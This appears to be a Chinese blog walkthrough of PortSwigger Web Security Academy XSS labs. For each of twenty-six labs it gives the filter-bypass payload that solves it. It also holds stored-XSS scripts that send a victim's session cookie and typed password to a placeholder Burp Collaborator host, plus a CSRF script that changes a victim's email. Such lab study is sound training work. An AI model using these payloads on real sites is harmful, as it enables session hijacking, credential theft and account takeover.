portswigger靶场XSS攻击实验
portswigger靶场XSS攻击实验
实验一、没有任何编码的反射型XSS
靶场
说明
This lab contains a simple reflected cross-site scripting vulnerability in the search functionality.
To solve the lab, perform a cross-site scripting attack that calls the alert function.
题解
直接构造最简单的XSS payload
<script>alert%28%29<%2Fscript>
实验二、没有任何编码的存储型XSS
靶场
说明
This lab contains a stored cross-site scripting vulnerability in the comment functionality.
To solve this lab, submit a comment that calls the alert function when the blog post is viewed.
题解
在博客留言下插入最简单的XSS playload,当文章页面时存储型xss就会发挥作用
<script>alert()</script>
实验三、从url获取参数写入DOM的DOM型XSS
使用location.search获得参数、使用document.write重新构建DOM的DOM型XSS
靶场
说明
This lab contains a DOM-based cross-site scripting vulnerability in the search query tracking functionality. It uses the JavaScript document.write function, which writes data out to the page. The document.write function is called with data from location.search, which you can control using the website URL.
To solve this lab, perform a cross-site scripting attack that calls the alert function.
题解
发现用户输入的搜索内容在js代码中会拼接到img标签的src属性中插入DOM节点,使用"闭合src属性,使用>闭合img标签,插入xss代码
search="><script>alert()</script>
实验四、从url获取参数写入innerHtml的DOM型XSS
靶场
说明
This lab contains a DOM-based cross-site scripting vulnerability in the search blog functionality. It uses an innerHTML assignment, which changes the HTML contents of a div element, using data from location.search.
To solve this lab, perform a cross-site scripting attack that calls the alert function.
题解
修改innerHtml时如果直接使用script标签插入xss代码不会自动执行,使用img标签的oerrer事件自动执行xss代码
<img src=2 onerror=alert()>
实验五、使用jQuery选择器修改元素属性的DOM型XSS
靶场
说明
This lab contains a DOM-based cross-site scripting vulnerability in the submit feedback page. It uses the jQuery library's $ selector function to find an anchor element, and changes its href attribute using data from location.search.
To solve this lab, make the "back" link alert document.cookie.
题解
进入Submit feedback页面,发现back按钮是一个a标签,其herf属性是通过js从url的returnPath属性中获取的,修改url,让xss代码自动执行
?returnPath=javascript:alert()
实验六、在jQuery选择器中使用hashchange事件的DOM型XSS
靶场
jquery-selector-hash-change-event
说明
This lab contains a DOM-based cross-site scripting vulnerability on the home page. It uses jQuery's $() selector function to auto-scroll to a given post, whose title is passed via the location.hash property.
To solve the lab, deliver an exploit to the victim that calls the print() function in their browser.
题解
本题没做懂,查看js源代码发现当页面hash值变化时,从页面数据中获取属性值作为jQuery选择器的值,获取到元素后滚动页面到元素,在服务器修改body值并发送数据包到客户端,可以造成页面hash值变化,触发XSS攻击执行print()函数
(官解)在服务器中修改body
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
实验七、带尖括号编码的反射型XSS
靶场
attribute-angle-brackets-html-encoded
说明
This lab contains a reflected cross-site scripting vulnerability in the search blog functionality where angle brackets are HTML-encoded. To solve this lab, perform a cross-site scripting attack that injects an attribute and calls the alert function.
题解
本题对尖括号做了编码,观察页面,文本框输入的内容作为input标签的value属性值,使用双引号闭合value属性值,创建鼠标移动事件执行XSS代码,并闭合后面的双引号避免报错
" onmouseover=alert() a="
实验八、带双引号编码的herf属性存储型XSS
靶场
href-attribute-double-quotes-html-encoded
说明
This lab contains a stored cross-site scripting vulnerability in the comment functionality. To solve this lab, submit a comment that calls the alert function when the comment author name is clicked.
题解
在博客评论中输入的网址会成为a标签herf属性的值
Website:
javascript:alert()
实验九、在js字符串中带尖括号编码的反射型XSS
靶场
javascript-string-angle-brackets-html-encoded
说明
This lab contains a reflected cross-site scripting](https://portswigger.net/web-security/cross-site-scripting/reflected) vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the `alert` function.
题解
观察页面js代码,使用'闭合字符串,构造新的js语句
';alert();'
实验十、在select元素中的DOM型XSS
靶场
document-write-sink-inside-select-element
说明
This lab contains a DOM-based cross-site scripting vulnerability in the stock checker functionality. It uses the JavaScript document.write function, which writes data out to the page. The document.write function is called with data from location.search which you can control using the website URL. The data is enclosed within a select element.
To solve this lab, perform a cross-site scripting attack that breaks out of the select element and calls the alert function.
题解
观察js代码,接收url中的storeId参数添加到dom中,构造xss代码
storeId=<script>alert()</script>
实验十一、在AngularJS中带尖括号和双引号HTML编码的DOM型XSS
靶场
说明
This lab contains a [DOM-based cross-site scripting](https://portswigger.net/web-security/cross-site-scripting/dom-based) vulnerability in a [AngularJS](https://portswigger.net/web-security/cross-site-scripting/contexts/angularjs-sandbox) expression within the search functionality.
AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the `ng-app` attribute (also known as an AngularJS directive). When a directive is added to the HTML code, you can execute JavaScript expressions within double curly braces. This technique is useful when angle brackets are being encoded.
To solve this lab, perform a [cross-site scripting](https://portswigger.net/web-security/cross-site-scripting) attack that executes an AngularJS expression and calls the `alert` function.
题解
AngularJS中使用双括号执行js脚本,constructor构造函数
{{$on.constructor('alert(1)')()}}
实验十二、反射型DOM XSS
靶场
说明
This lab demonstrates a reflected DOM vulnerability. Reflected DOM vulnerabilities occur when the server-side application processes data from a request and echoes the data in the response. A script on the page then processes the reflected data in an unsafe way, ultimately writing it to a dangerous sink.
To solve this lab, create an injection that calls the alert() function.
题解
首先在搜索框中提交搜索,观察页面源代码,在searchResults.js中当接收到服务器响应时执行一个匿名函数
在此函数中eval('var searchResultsObj = ' + this.responseText)使用了eval函数,将响应的数据拼接字符串后执行
再观察页面响应的json数据,对双引号做了转义,但是未对\作转义,在双引号前加\,可以使双引号逃逸,在alert末尾添加}//,使json数据提前结束
\"-alert(1)}//
实验十三、存储型XSS
靶场
说明
This lab demonstrates a stored DOM vulnerability in the blog comment functionality. To solve this lab, exploit this vulnerability to call the alert() function.
题解
js源代码中可以得知使用.replace()将尖括号换成空字符串,但是只对第一个<和>进行替换,在xss代码前插入一组<>即可使xss代码逃逸
<><img src=2 onerror=alert(1)>
实验十四、利用XSS窃取cookies
靶场
说明
This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's session cookie, then use this cookie to impersonate the victim.
注意
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.
Some users will notice that there is an alternative solution to this lab that does not require Burp Collaborator. However, it is far less subtle than exfiltrating the cookie.
题解
在博客评论中提交playload
打开burp collaborator client,获取playerload,替换BURP-COLLABORATOR-SUBDOMAIN
<script> new Image().src="http://BURP-COLLABORATOR-SUBDOMAIN?Cooike="+encodeURI(document.cookie); </script>
获取到secret=xxx;session=xxx,篡改http请求头的cookie字段,成功。
实验十五、利用XSS窃取密码
靶场
说明
This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's username and password then use these credentials to log in to the victim's account.
注意
同实验十四:为了防止此靶场被用来攻击其他站点,靶场服务器防火墙将会阻止外网访问。因此要完成靶场实验,需要使用Burp Collaborator的公共服务器。
题解
官解:(本题钩直饵咸,想破脑袋也没想出来
打开burp collaborator client,获取playerload,替换BURP-COLLABORATOR-SUBDOMAIN
在博客评论中提交此代码
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+'-'+this.value
});">
获取到账号密码 administrator-xxx
实验十六、利用XSS实施跨站请求伪造CSRF
靶场
说明
This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments.
You can log in to your own account using the following credentials: wiener:peter
题解
登录自己的账号wiener:peter,提交修改email请求,观察请求包,发现请求的url是/my-account/change-email
当其他用户点击该博客时,xss攻击模拟发送GET请求获得my-account页面,使用正则匹配获取到csrf值,然后就可以使用该csrf模拟请求/my-account/change-email修改该用户邮箱了
<script>
var req = new XMLHttpRequest();
req.onload = function(){
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=hacker@hack.com')
};
req.open('get','/my-account',true);
req.send();
</script>
实验十七、大部分html标签和属性被过滤的反射型XSS
靶场
html-context-with-most-tags-and-attributes-blocked
说明
This lab contains a reflected XSS vulnerability in the search functionality but uses a web application firewall (WAF) to protect against common XSS vectors.
To solve the lab, perform a cross-site scripting attack that bypasses the WAF and calls the print() function.
注意
Your solution must not require any user interaction. Manually causing print() to be called in your own browser will not solve the lab.
题解
body和onresize未被过滤,但是要手动改变窗口大小才会触发
<body onresize=print()>
使用iframe和onload属性自动触发onresize事件
<iframe src="https://acb41f441e21c43ac013531500d400bb.net/?search="><body onresize=print()>" onload=this.style.width='100px'>
回到exploit server,将以下playload保存并发送给受害者
<iframe src="https://你的靶场ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
实验十八、除了自定义标签外所有html标签都被过滤的反射型XSS
靶场
html-context-with-all-standard-tags-blocked
说明
This lab blocks all HTML tags except custom ones.
To solve the lab, perform a cross-site scripting attack that injects a custom tag and automatically alerts document.cookie.
题解
自定义标签可以设置ID属性,在url中使用#id可以将页面定位到指定id元素。
tabindex属性:当浏览者使用TAB键在网页控件中移动时,将首先移动到具有最小tabIndex属性值的控件上,最后在具有最大tabIndex属性值的控件上结束移动。 默认的tabIndex属性为 0 ,将排列在在所有指定tabIndex的控件之后。将tabIndex属性设成1到32767的一个值,就可以把这个控件加入到TAB键的序列中
将该自定义标签tabindex属性设置为1,可让该元素自动获得焦点(触发onfocus事件)
进入exploit server,在body中输入以下代码
<script> location="https://你的靶场ID.web-security-academy.net/?search=<xss%20id=xss%20onfocus=alert(document.cookie)%20tabindex=1>#xss" </script>
实验十九、允许带有一些SVG标签的反射型XSS
靶场
说明
This lab has a simple reflected XSS vulnerability. The site is blocking common tags but misses some SVG tags and events.
To solve the lab, perform a cross-site scripting attack that calls the alert() function.
题解
butp suite中intruder爆破标签和属性发现svg标签、animatetransform标签(变动目标元素上的一个变形属性)和onbeign(动画开始事件)未被过滤
<svg><animatetransform onbegin=alert(1)>
实验二十、在规范链接标签中的反射型XSS
靶场
说明
This lab reflects user input in a canonical link tag and escapes angle brackets.
To solve the lab, perform a cross-site scripting attack on the home page that injects an attribute that calls the alert function.
To assist with your exploit, you can assume that the simulated user will press the following key combinations:
ALT+SHIFT+X
CTRL+ALT+X
Alt+X
Please note that the intended solution to this lab is only possible in Chrome.
题解
accesskey 属性规定激活元素的快捷键,靶场假设用户会用x快捷键,使用'闭合link标签属性值
?'accesskey='x'onclick='alert()'
实验二十一、在js字符串中转义了单引号和反斜杠的反射型XSS
靶场
javascript-string-single-quote-backslash-escaped
说明
This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality. The reflection occurs inside a JavaScript string with single quotes and backslashes escaped.
To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.
题解
嵌入在html中的js代码虽然对单引号和反斜杠进行了转义,但可以直接闭合script标签对js进行降维打击
</script><script>alert(1)</script>
实验二十二、在js字符串中转义了单引号并对尖括号和双引号进行html编码的反射型XSS
靶场
javascript-string-angle-brackets-double-quotes-encoded-single-quotes-escaped
说明
This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets and double are HTML encoded and single quotes are escaped.
To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.
题解
发现反斜杠未被转义,使用反斜杠转义用以转义用户输入单引号的反斜杠,使输入的单引号得以逃逸从而闭合js字符串,在alert后增加//注释符号防止js报错
\';alert();//
实验二十三、对尖括号和双引号html编码及对单引号和反斜杠进行转义的存储型onclick事件XSS
靶场
onclick-event-angle-brackets-double-quotes-html-encoded-single-quotes-backslash-escaped
说明
This lab contains a stored cross-site scripting vulnerability in the comment functionality.
To solve this lab, submit a comment that calls the alert function when the comment author name is clicked.
题解
提交评论发现输入的网址被放在了onclick事件中作为字符串被单引号包裹
尝试构造playload,http是为了通过网址检查,使用html实体编码绕过单引号转义,增加右括号和分号闭合上条语句,插入xss代码后再使用实体编码闭合原来后面的单引号,避免语法错误
http://');alert('
实验二十四、对``><'"`进行模板文本unicode转义的反射型XSS
靶场
javascript-template-literal-angle-brackets-single-double-quotes-backslash-backticks-escaped
说明
This lab contains a reflected cross-site scripting vulnerability in the search blog functionality. The reflection occurs inside a template string with angle brackets, single, and double quotes HTML encoded, and backticks escaped. To solve this lab, perform a cross-site scripting attack that calls the alert function inside the template string.
题解
实际上考的是es6新增的模板字符串语法
var = 'string1'
`string2${var}` -> 'string1string2'
可以在字符串中插入变量完成拼接
在搜索框中输入,和原本js代码中的``拼接成为es6模板语法执行模板内的代码
${alert()}
实验二十五、href属性和各种事件被过滤的反射型XSS
靶场
event-handlers-and-href-attributes-blocked
说明
This lab contains a reflected XSS vulnerability with some whitelisted tags, but all events and anchor href attributes are blocked..
To solve the lab, perform a cross-site scripting attack that injects a vector that, when clicked, calls the alert function.
Note that you need to label your vector with the word "Click" in order to induce the simulated lab user to click your vector. For example:
<a href="">Click me</a>
题解
<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>
实验二十六、在Js URL中一些字符被过滤的反射型XSS
靶场
javascript-url-some-characters-blocked
说明
This lab reflects your input in a JavaScript URL, but all is not as it seems. This initially seems like a trivial challenge; however, the application is blocking some characters in an attempt to prevent XSS attacks.
To solve the lab, perform a cross-site scripting attack that calls the alert function with the string 1337 contained somewhere in the alert message.
题解
官解
post?postId=5&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'
实际上拼接后的html中的伪代码
<a href="javascript:fetch('/analytics', {method:'post',body:'/post?postId=1&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:''}).finally(_ => window.location = '/')">Back to Blog</a>
实验二十七到三十
涉及到AngularJS框架 和 CSP安全策略,暂不做
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 25岁的心里话
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
· 零经验选手,Compose 一天开发一款小游戏!